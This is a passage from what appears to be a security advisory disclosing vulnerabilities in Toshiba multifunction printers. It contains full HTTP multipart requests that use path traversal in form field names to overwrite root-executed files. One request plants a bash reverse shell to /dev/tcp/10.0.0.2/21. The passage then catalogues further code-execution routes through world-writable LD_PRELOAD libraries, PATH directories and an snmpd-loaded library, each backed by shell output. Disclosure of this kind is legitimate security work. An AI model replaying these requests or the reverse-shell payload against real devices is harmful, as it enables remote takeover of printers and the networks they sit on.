\/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320<br \/>Content-Disposition: form-data;<br \/>name=&#8221;\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver&#8221;;<br \/>filename=&#8221;script.zip&#8221;<br \/>Content-Type: application\/zip<\/p>\n<p>#!\/bin\/sh<\/p>\n<p>bash -i &gt;&amp; \/dev\/tcp\/10.0.0.2\/21 0&gt;&amp;1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;136357212815291094282690264320&#8211;<\/p>\n<p>Following this HTTP request, the file<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver` will be<br \/>overwritten with a malicious payload.<\/p>\n<p>Before the execution of the HTTP request, the file is normal:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>-rwxrwxrwx 1 root root 7007 Mar 15 11:45<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>bash-4.1# head \/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>#!\/bin\/bash<br \/>LDAP_STARTUP_STATUS=0;<\/p>\n<p>function stop() {<br \/>echo &#8220;slapd is stopped&#8221;<br \/>kill -SIGINT `pgrep slapd`<br \/>check_stop_process<br \/>}<\/p>\n<p>function start() {<br \/>bash-4.1#<\/p>\n<p>After the execution of the HTTP request, the file has been modified.<br \/>It now contains the malicious payload:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>-rw-rw-rw- 1 apache trusted 52 May 27 16:35<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>bash-4.1# cat \/home\/SYSROM_SRC\/build\/common\/bin\/networkservice\/ldapserver<br \/>#!\/bin\/sh<\/p>\n<p>bash -i &gt;&amp; \/dev\/tcp\/10.0.0.2\/21 0&gt;&amp;1<br \/>bash-4.1#<\/p>\n<p>Another exploitation of a different form is shown below, using the<br \/>upload of drivers. It exploits the same vulnerability. The file<br \/>`\/home\/SYSROM_SRC\/sbin\/malicious.program` will contain `test`:<\/p>\n<p>Upload of `\/home\/SYSROM_SRC\/sbin\/malicious.program`:<\/p>\n<p>POST \/contentwebserver\/upload HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Content-Type: multipart\/form-data;<br \/>boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;8960912535828260861374302822<br \/>Content-Length: 1813<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/Administration\/maintenance\/uploadsoft\/UnixList.html?v=1517352288ta&amp;fileMode=2<br \/>Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW;<br \/>TopAccessURL=http%3A\/\/10.0.0.1%3A8080\/%3FMAIN%3DTOPACCESS;<br \/>SessionID=Session_3e61919e-556b-4be7-8a18-91bb65a4752b; clicked=0;<br \/>addrLastVisited=ADDRBK; IgnoreSessionTimeout=1;<br \/>Session=10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee<br \/>Upgrade-Insecure-Requests: 1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;formSubmitCompleteEventHandler&#8221;<\/p>\n<p>frames[0].formSubmitCompleteUploadList<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;DeviceInformationModel&#8221;<\/p>\n<p>&lt;DeviceInformationModel&gt;&lt;Command&gt;&lt;Move&gt;&lt;commandNode&gt;FileStorages&lt;\/commandNode&gt;&lt;Params&gt;&lt;source&gt;&lt;File&gt;aix.tar&lt;\/File&gt;&lt;name&gt;Upload&lt;\/name&gt;&lt;\/source&gt;&lt;destination&gt;&lt;name&gt;Unix-Filters&lt;\/name&gt;&lt;\/destination&gt;&lt;\/Params&gt;&lt;\/Move&gt;&lt;\/Command&gt;&lt;\/DeviceInformationModel&gt;<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;CsrfpId&#8221;<\/p>\n<p>10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data;<br \/>name=&#8221;\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/sbin\/malicious.program&#8221;;<br \/>filename=&#8221;aix.tar&#8221;<br \/>Content-Type: application\/x-tar<\/p>\n<p>test<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;hpux.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;hpux64.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;linux.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;openunix.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822<br \/>Content-Disposition: form-data; name=&#8221;solaris.tar&#8221;; filename=&#8221;&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;8960912535828260861374302822&#8211;<\/p>\n<p>And we can confirm this file has been uploaded on the printer:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/sbin\/malicious.program<br \/>-rw-rw-rw- 1 apache trusted 5 May 27 07:48<br \/>\/home\/SYSROM_SRC\/sbin\/malicious.program<br \/>bash-4.1#<\/p>\n<p>This vulnerability can be used to get Remote Code Executions using<br \/>several different ways. Due to some weaknesses found in Toshiba<br \/>printers, there are hundreds different ways to get Remote Code<br \/>Execution. For example:<\/p>\n<p>* Upload of a malicious library defined in the LD_PRELOAD variable:<br \/>* \/ramdisk\/al\/libGetNameInfoInterface.so or<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so can be overwritten by a<br \/>malicious library<br \/>* Upload of a malicious library using the LD_LIBRARY_PATH variable &#8211;<br \/>An attacker can upload malicious libraries inside:<br \/>* \/home\/SYSROM_SRC\/build\/release\/lib,<br \/>* \/mfp\/lib,<br \/>* \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib,<br \/>* \/home\/SYSROM_SRC\/build\/thirdparty\/plugins\/platforminputcontexts\/,<br \/>* \/home\/SYSROM_SRC\/build\/release\/lib.<br \/>* Upload of a malicious program due to insecure permissions:<br \/>* As shown in Local Privilege Escalation and Remote Code Execution<br \/>using insecure permissions for 106 programs, a lot of programs running<br \/>as root can be overwritten due to insecure permissions (777)<br \/>* Upload a malicious Python program or a malicious Python library<br \/>* Replace Bash scripts<br \/>* &#8230;<\/p>\n<p>An attacker with admin privileges can remotely compromise any Toshiba printer.<\/p>\n<p>An attacker with admin privileges can overwrite any insecure file<br \/>(including programs running as root and Python code).<\/p>\n<p>## Details &#8211; Lack of privileges separation<\/p>\n<p>Toshiba printers do not implement privileges separation. An attacker<br \/>compromising a program will be able to compromise the entire printer.<\/p>\n<p>For example, all the programs, except Apache, are running as root.<\/p>\n<p>Apache is not running as root but a Local Privilege Escalation can be<br \/>achieved using one of these vulnerabilities:<\/p>\n<p>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using snmpd<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using insecure PATH<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure LD_PRELOAD<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure LD_LIBRARY_PATH<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure permissions for 106 programs<\/p>\n<p>Listing of processes on the printer:<\/p>\n<p>bash-4.1# ps auxw<br \/>USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND<br \/>root 1 0.0 0.0 1740 512 ? Ss 16:34 0:00 init [3]root 2 0.0 0.0 0 0 ? S 16:34 0:00 [kthreadd]root 3 0.0 0.0 0 0 ? S 16:34 0:00<br \/>[ksoftirqd\/0][&#8230;]root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/slapd -h ldap:\/\/127.0.0.1 -f<br \/>\/home\/SYSROM_SRC\/build\/release\/etc\/openldap\/slapd.conf -d 1<br \/>root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02<br \/>\/home\/SYSROM_SRC\/bin\/mapper firstboot=0<br \/>root 1482 0.0 0.0 26120 2628 ? Ss 16:34 0:00<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker -f<br \/>\/encryption\/al\/network\/config\/httpd-prox.conf -k start<br \/>apache 1486 0.0 0.1 1264444 3728 ? Sl 16:34 0:00<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker -f<br \/>\/encryption\/al\/network\/config\/httpd-prox.conf -k start<br \/>[&#8230;]root 1757 0.0 0.2 34388 8176 ? S 16:34 0:00<br \/>.\/cipollproc<br \/>root 1758 0.0 0.2 34432 8180 ? S&lt; 16:34 0:00<br \/>.\/ciprioritymanager<br \/>root 1785 0.3 1.9 815004 59476 ? Sl 16:34 0:51<br \/>.\/ebx_dl 1539 1537 1540 1 2 3 -T8<br \/>root 1786 0.0 0.5 101584 15612 ? S 16:34 0:00<br \/>.\/de_ipfax 1539 1537 1540 1 2 3 -T8<br \/>root 1803 0.0 0.3 38908 9448 ? S 16:34 0:00<br \/>.\/alnfcplugin<br \/>root 1846 0.0 0.0 15544 2788 ? S 16:34 0:00<br \/>\/home\/SYSROM_SRC\/bin\/eBXDebugLogUtility<br \/>root 1850 0.0 0.0 1744 500 ttyS0 Ss+ 16:34 0:00<br \/>\/sbin\/getty 115200 ttyS0<br \/>root 1864 0.0 0.4 46528 13060 ? S 16:34 0:00<br \/>.\/alfilestoragem -T8<br \/>root 1866 0.0 0.6 60164 18036 ? S 16:34 0:00 .\/alusermgr<br \/>root 1867 0.0 0.4 44120 14156 ? S 16:34 0:00<br \/>.\/allicensemgmt<br \/>root 1868 0.0 0.6 56792 18680 ? Sl 16:34 0:00<br \/>.\/aldeviceserviceplugin<br \/>root 1869 0.0 1.4 84708 42192 ? S 16:34 0:03<br \/>.\/aldeviceconfigplugin<br \/>root 1870 0.0 0.6 60856 20516 ? S 16:34 0:01<br \/>.\/aluserAuthMgr<br \/>root 1871 0.0 0.3 41912 11224 ? S 16:34 0:00 .\/algrpmgr<br \/>root 1872 0.0 0.4 43616 13080 ? S 16:34 0:00 .\/alrolemgr<br \/>root 1873 0.0 0.5 54708 14972 ? Sl 16:34 0:05<br \/>.\/alrestrictionmode<br \/>root 1874 0.0 0.5 61692 15364 ? Sl 16:34 0:00<br \/>.\/alsecurityconfiguration<br \/>root 1875 0.0 0.3 41408 11008 ? S 16:34 0:00<br \/>.\/alintegritychkmgr<br \/>root 1876 0.3 3.6 482584 108060 ? Sl 16:34 0:43<br \/>.\/alUiFrameWork legacy -S ramdisk<br \/>root 1877 0.0 0.9 92276 26968 ? Sl 16:34 0:01<br \/>.\/alpanel panel 49 Controller\/Settings\/autoClear<br \/>Controller\/Information\/Locale -T4<br \/>root 1878 0.0 0.4 60888 14588 ? S 16:34 0:00<br \/>.\/aljobtemplatemgr<br \/>root 1879 0.0 0.3 42492 11204 ? S 16:34 0:00<br \/>.\/alLogRetriever -T8<br \/>root 1880 0.0 0.4 49340 14248 ? S 16:34 0:00<br \/>.\/alExportImport -T8<br \/>root 1881 0.0 0.4 57852 14596 ? S 16:34 0:00<br \/>.\/aleFilingmgr -T8<br \/>root 1882 0.0 0.4 60244 13020 ? Sl 16:34 0:00<br \/>.\/alpresentationresourcemgr -T8<br \/>root 1883 0.0 0.2 35036 8340 ? S 16:34 0:00<br \/>.\/alServiceUIPlugin<br \/>root 1884 0.0 0.3 45624 10220 ? Sl 16:34 0:00<br \/>.\/alPanelUIMessageHandler -S ramdisk<br \/>root 1885 0.0 0.3 42016 11916 ? S 16:34 0:00<br \/>.\/alusbmscapplication<br \/>root 1886 0.0 0.4 70124 12236 ? Sl 16:34 0:00<br \/>.\/alViewPlugin<br \/>root 1887 0.0 0.4 83200 12652 ? Sl 16:34 0:00<br \/>.\/alsharedprintDp -T8<br \/>root 1888 0.0 0.7 62028 22420 ? S 16:34 0:06<br \/>.\/alnsm -d9 -m00 -T5<br \/>root 1890 0.0 0.5 128920 16292 ? Sl 16:34 0:00<br \/>.\/aljobcontroller -T8<br \/>root 1891 0.0 0.4 118216 12728 ? Sl 16:34 0:00<br \/>.\/alprintmn -T8<br \/>root 1892 0.0 0.3 49888 11220 ? Sl 16:34 0:00<br \/>.\/alreportsmsgr<br \/>root 1893 0.0 0.5 72764 17720 ? Sl 16:34 0:00<br \/>.\/alreportmanager<br \/>root 1922 0.0 0.3 46056 11236 ? S 16:34 0:00<br \/>.\/almailboxapplication<br \/>root 1923 0.0 0.4 44204 13528 ? S 16:34 0:00<br \/>.\/alsoftwareupdateclient -T8<br \/>root 1974 0.0 0.5 56496 15560 ? S 16:34 0:00<br \/>.\/alifaxreceive -T8<br \/>root 1975 0.0 0.4 47184 14844 ? S 16:34 0:00<br \/>.\/almaintenanceplugin -T6<br \/>root 1976 0.0 0.3 41416 11312 ? S 16:34 0:00<br \/>.\/alpdlfiltermanager<br \/>root 1977 0.0 0.4 51736 14524 ? S 16:34 0:00<br \/>.\/alCloning -T8<br \/>root 1978 0.0 0.3 43528 9412 ? Sl 16:34 0:00<br \/>.\/alPanelStartLEDHandler<br \/>root 1979 0.0 0.3 39964 11504 ? S 16:34 0:00<br \/>.\/alhomedatamgr<br \/>root 1980 0.0 0.6 47532 18748 ? S 16:34 0:00 .\/sim -T8<br \/>root 1981 0.0 0.7 92856 23600 ? Sl 16:34 0:01<br \/>.\/informationservice -T8<br \/>root 1982 0.0 0.2 34624 8476 ? S 16:34 0:00<br \/>.\/sljobmanagement -T8<br \/>root 1985 0.0 0.7 59792 22588 ? Sl 16:34 0:00<br \/>.\/notificationservice 1284 -T8<br \/>root 1986 0.0 0.9 87936 28716 ? Sl 16:34 0:03 .\/wfpc -T8<br \/>root 1987 0.0 0.3 35524 9156 ? S 16:34 0:00 .\/armn -T8<br \/>root 2205 0.0 0.4 59596 12808 ? Ss 16:35 0:00 .\/wfpc -T8<br \/>root 2208 0.0 0.3 59144 11220 ? Ss 16:35 0:00 .\/wfpc -T8<br \/>root 2327 0.0 0.4 55020 13452 ? S 16:35 0:00<br \/>.\/alAddressBookMgr<br \/>root 2328 0.0 0.5 72396 15208 ? Sl 16:35 0:00<br \/>.\/alaccountmgr<br \/>root 2426 0.0 0.3 46192 10496 ? Sl 16:35 0:00<br \/>.\/agent_scan 1282 1 -T8<br \/>root 2428 0.0 0.3 44272 9844 ? Sl 16:35 0:00<br \/>.\/agent_faxreceive 1282 2 -T8<br \/>root 2430 0.0 0.6 450116 19668 ? Sl 16:35 0:00<br \/>.\/agent_rip 1282 6 -T8<br \/>root 2432 0.0 0.3 47100 10260 ? Sl 16:35 0:00<br \/>.\/agent_print 1282 15 -T8<br \/>root 2433 0.0 0.3 44316 9816 ? Sl 16:35 0:00<br \/>.\/agent_faxtransmit 1282 16 -T8<br \/>root 2434 0.0 0.3 44296 9800 ? Sl 16:35 0:00<br \/>.\/agent_ipfaxtransmit 1282 31 -T8<br \/>root 2435 0.0 0.3 44268 9796 ? Sl 16:35 0:00<br \/>.\/agent_ipfaxreceive 1282 32 -T8<br \/>root 2515 0.0 0.4 54636 13444 ? Sl 16:35 0:00 .\/alulm<br \/>root 2516 0.0 0.3 249732 9260 ? Sl 16:35 0:00<br \/>.\/alcbamanager -S ramdisk<br \/>root 2614 0.0 0.5 183976 17564 ? Sl 16:35 0:00<br \/>.\/alappmanager<br \/>root 2870 0.0 0.4 54968 14848 ? Sl 16:35 0:00<br \/>.\/alLogmanager<br \/>root 2871 0.0 0.4 46088 13440 ? S 16:35 0:00<br \/>.\/alhddbackuprestore<br \/>[&#8230;]root 3784 0.0 0.4 45704 12760 ? S 16:35 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alftpprintd<br \/>root 3828 0.0 0.0 15516 2424 ? S 16:35 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/vsftpd -enableprinting<br \/>root 3860 0.1 2.3 201372 70908 ? Sl 16:35 0:25<br \/>python \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>10000000-0000-0000-0000-500000000000<br \/>root 3935 0.0 0.4 218132 13644 ? Sl 16:35 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhp9100 -f<br \/>\/encryption\/al\/network\/config\/hp9100.conf<br \/>root 3970 0.1 1.6 144908 48860 ? Sl 16:35 0:24<br \/>python \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>10000000-0000-0000-0000-500000000001<br \/>root 3992 0.0 0.2 33948 8128 ? S 16:35 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/snmp_watchdog<br \/>root 4025 0.0 0.2 34236 8920 ? S 16:35 0:00<br \/>\/home\/SYSROM_SRC\/bin\/dnsValidateDaemon<br \/>[&#8230;]\n<p>The printer does not implement separation of privileges.<\/p>\n<p>A vulnerability found inside one of the multiple components in the<br \/>printer is enough to completely compromise the security of printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution using snmpd<\/p>\n<p>Toshiba printers are vulnerable to a Local Privilege Escalation<br \/>vulnerability because of an insecure library defined inside the<br \/>configuration of snmpd. This Local Privilege Escalation can be also<br \/>exploited as a Remote Code Execution by uploading a malicious library.<\/p>\n<p>The snmpd configuration file located at<br \/>`\/encryption\/al\/network\/config\/snmpd.conf` contains the loading of an<br \/>external and Toshiba-specific library. The code contained inside this<br \/>library will be executed as root (as snmpd is running as root).<\/p>\n<p>Content of `\/encryption\/al\/network\/config\/snmpd.conf`:<\/p>\n<p>dlmod mibs_impl<br \/>\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so<\/p>\n<p>This file is a symbolic link to the<br \/>`\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so.0` library.<\/p>\n<p>The `\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so.0` file has incorrect<br \/>permissions, allowing any local attacker or any remote attacker<br \/>exploiting the Pre-authenticated Remote Code Execution as root or<br \/>apache and multiple Local Privilege Escalations vulnerability to<br \/>replace this file with a malicious library.<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/lib\/libalmibs_impl.so*<br \/>lrwxrwxrwx 1 root root 19 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so -&gt; libalmibs_impl.so.0<br \/>-rwxrwxrwx 1 root root 5239499 Dec 6 03:28<br \/>\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so.0<br \/>bash-4.1#<\/p>\n<p>This file will be loaded when snmpd starts. The snmpd program starts<br \/>during the boot of the printer and is automatically restarted when it<br \/>crashes.<\/p>\n<p>It is possible to crash the remote snmpd server using the<br \/>Pre-authenticated Remote Code Execution as root vulnerability to force<br \/>the restart of the snmpd daemon, load the malicious library and<br \/>compromise the printer.<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure PATH<\/p>\n<p>Toshiba printers are vulnerable to a Local Privilege Escalation<br \/>vulnerability because of an insecure PATH variable. This Local<br \/>Privilege Escalation can be also exploited as a Remote Code Execution<br \/>by uploading a malicious program using the Pre-authenticated Remote<br \/>Code Execution as root or apache and multiple Local Privilege<br \/>Escalations vulnerability.<\/p>\n<p>It was observed that the Toshiba printers are configured with an<br \/>insecure `$PATH` variable:<\/p>\n<p>bash-4.1# echo $PATH<br \/>\/home\/SYSROM_SRC\/build\/release\/bin:\/home\/SYSROM_SRC\/build\/release\/sbin:\/home\/SYSROM_SRC\/build\/release\/bin:<br \/>\/home\/SYSROM_SRC\/build\/release\/sbin:\/home\/SYSROM_SRC\/build\/release\/bin:\/home\/SYSROM_SRC\/build\/release\/sbin:<br \/>\/bin:\/usr\/bin:\/sbin:\/usr\/sbin:\/sbin:\/bin\/:\/usr\/bin\/:\/usr\/sbin:\/sbin:\/bin\/:\/usr\/bin\/:\/usr\/sbin:\/sbin:\/bin\/:\/usr\/bin\/:\/usr\/sbin<br \/>bash-4.1#<\/p>\n<p>The `$PATH` variable contains several directories with insecure<br \/>permissions (777) allowing any attacker to plant malicious programs<br \/>that will be then executed instead of regular programs:<\/p>\n<p>&#8211; &#8211; `\/home\/SYSROM_SRC\/build\/release\/bin`<br \/>&#8211; &#8211; `\/home\/SYSROM_SRC\/build\/release\/sbin`<\/p>\n<p>These 2 directories are specified multiple times and are configured<br \/>with the 777 permissions:<\/p>\n<p>Insecure permissions of `\/home\/SYSROM_SRC\/build\/release\/bin` and<br \/>`\/home\/SYSROM_SRC\/build\/release`:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/bin<br \/>lrwxrwxrwx 1 root trusted 17 Mar 14 16:34 \/home\/SYSROM_SRC\/bin -&gt;<br \/>build\/release\/bin<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/bin<br \/>total 176508<br \/>drwxrwxrwx 2 root root 36864 Mar 15 16:12 .<br \/>drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..<br \/>lrwxrwxrwx 1 root root 25 Mar 14 16:27 2to3 -&gt;<br \/>..\/..\/thirdparty\/bin\/2to3<br \/>lrwxrwxrwx 1 root root 29 Mar 14 16:27 2to3-3.5 -&gt;<br \/>..\/..\/thirdparty\/bin\/2to3-3.5<br \/>-rwxrwxrwx 1 root root 120381 Dec 6 01:56 ALABAMA_Large.ico<br \/>-rwxrwxrwx 1 root root 25214 Dec 6 01:56 ALABAMA_Small.ico<br \/>-rwxrwxrwx 1 root root 143884 Dec 6 01:56 ALABAMA_f_Large.ico<br \/>-rwxrwxrwx 1 root root 25214 Dec 6 01:56 ALABAMA_f_Small.ico<br \/>lrwxrwxrwx 1 root root 39 Mar 14 16:27<br \/>AppLicenseDataBase -&gt; ..\/..\/thirdparty\/bin\/AppLicenseDataBase<br \/>&#8230;<\/p>\n<p>Insecure permissions of `\/home\/SYSROM_SRC\/build\/release\/sbin` and<br \/>`\/home\/SYSROM_SRC\/build\/release`:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/sbin<br \/>lrwxrwxrwx 1 root root 18 Mar 14 16:34 \/home\/SYSROM_SRC\/sbin -&gt;<br \/>build\/release\/sbin<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/sbin<br \/>total 608<br \/>drwxrwxrwx 2 root root 4096 Dec 6 01:40 .<br \/>drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..<br \/>-rwxrwxrwx 1 root root 4467 Dec 6 01:40 CheckAndRemovePerms.sh<br \/>lrwxrwxrwx 1 root root 26 Mar 14 16:27 afpd -&gt;<br \/>..\/..\/thirdparty\/sbin\/afpd<br \/>lrwxrwxrwx 1 root root 30 Mar 14 16:27 arpaname -&gt;<br \/>..\/..\/thirdparty\/sbin\/arpaname<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:27 atalkd -&gt;<br \/>..\/..\/thirdparty\/sbin\/atalkd<br \/>lrwxrwxrwx 1 root root 30 Mar 14 16:27 cnid_dbd -&gt;<br \/>..\/..\/thirdparty\/sbin\/cnid_dbd<br \/>lrwxrwxrwx 1 root root 32 Mar 14 16:27 cnid_metad -&gt;<br \/>..\/..\/thirdparty\/sbin\/cnid_metad<br \/>lrwxrwxrwx 1 root root 34 Mar 14 16:27 ddns-confgen -&gt;<br \/>..\/..\/thirdparty\/sbin\/ddns-confgen<br \/>&#8230;<\/p>\n<p>On a side note, the `\/home\/SYSROM_SRC` directory is highly insecure<br \/>with incorrect permissions used everywhere:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC<br \/>total 52<br \/>drwxr-xr-x 9 root root 4096 Mar 14 16:34 .<br \/>drwxr-xr-x 4 root root 4096 Mar 14 16:28 ..<br \/>lrwxrwxrwx 1 root root 30 Mar 14 16:28 CBAHttpServer -&gt;<br \/>\/registration\/al\/CBAHttpServer<br \/>lrwxrwxrwx 1 root root 20 Mar 14 16:27 HDBROOT -&gt; \/home\/SYSROM_SRC\/tmp<br \/>drwxrwxrwx 7 root root 4096 Dec 6 00:46 NoBuildItems<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:28 Resources -&gt;<br \/>\/registration\/data\/Resources<br \/>lrwxrwxrwx 1 root root 32 Mar 14 16:28 Resources_eBN -&gt;<br \/>\/registration\/data\/Resources_eBN<br \/>-rwxr-xr-x 1 root root 5614 Mar 14 16:28 Startup.sh<br \/>lrwxrwxrwx 1 root root 40 Apr 6 2016 TopAccess -&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/TopAccess<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:28 TopAccessPy -&gt;<br \/>\/registration\/al\/TopAccessPy<br \/>lrwxrwxrwx 1 root root 23 Mar 14 16:28 WebAPI -&gt;<br \/>\/registration\/al\/WebAPI<br \/>lrwxrwxrwx 1 root root 25 Mar 14 16:28 WebPanel -&gt;<br \/>\/registration\/al\/WebPanel<br \/>lrwxrwxrwx 1 root trusted 17 Mar 14 16:34 bin -&gt; build\/release\/bin<br \/>drwxr-xr-x 5 root root 4096 Apr 6 2016 build<br \/>drwxrwxrwx 2 root root 4096 Dec 6 01:13 config<br \/>drwxrwxrwx 3 root root 4096 Mar 14 16:28 data<br \/>lrwxrwxrwx 1 root root 17 Mar 14 16:34 etc -&gt; build\/release\/etc<br \/>-rwxr-xr-x 1 root root 1075 Mar 14 16:27 install_rip_ram.sh<br \/>drwxrwxrwx 4 root root 4096 Mar 14 16:34 jobdata<br \/>lrwxrwxrwx 1 root trusted 17 Mar 14 16:34 lib -&gt; build\/release\/lib<br \/>drwxrwxrwx 2 root root 4096 Dec 6 04:48 logs<br \/>lrwxrwxrwx 1 root root 18 Mar 14 16:34 sbin -&gt; build\/release\/sbin<br \/>-rwxrwxrwx 1 root root 3492 Dec 8 2017 setenv<br \/>lrwxrwxrwx 1 root root 19 Mar 14 16:34 share -&gt; build\/release\/share<br \/>drwxr-xr-x 3 root root 4096 Dec 6 04:48 var<br \/>bash-4.1#<\/p>\n<p>An attacker can place any malicious program inside<br \/>`\/home\/SYSROM_SRC\/build\/release\/bin` or<br \/>`\/home\/SYSROM_SRC\/build\/release\/sbin` and they will be executed before<br \/>legit programs that are stored in the regular UNIX directories<br \/>(`\/bin`, `\/usr\/bin`, `\/sbin`, `\/usr\/sbin`).<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure LD_PRELOAD<\/p>\n<p>Toshiba printers are vulnerable to a Local Privilege Escalation<br \/>vulnerability because of an insecure LD_PRELOAD variable. This Local<br \/>Privilege Escalation can be also exploited as a Remote Code Execution<br \/>by uploading a malicious library using the Pre-authenticated Remote<br \/>Code Execution as root or apache and multiple Local Privilege<br \/>Escalations vulnerability.<\/p>\n<p>Toshiba printers are configured with an insecure `LD_PRELOAD` variable:<\/p>\n<p>bash-4.1# printenv | grep LD_PRELOAD<br \/>LD_PRELOAD=\/ramdisk\/al\/libGetNameInfoInterface.so:\/ramdisk\/al\/libGetAddtInfoInterface.so:<br \/>bash-4.1#<\/p>\n<p>The `$LD_PRELOAD` variable contains 2 libraries with insecure<br \/>permissions (777) allowing any attacker to replace these libraries<br \/>with malicious libraries that will be then executed:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/al\/libGetNameInfoInterface.so`<br \/>&#8211; &#8211; `\/ramdisk\/al\/libGetAddtInfoInterface.so`<\/p>\n<p>Checking the permissions of libraries defined in LD_PRELOAD:<\/p>\n<p>bash-4.1# ls 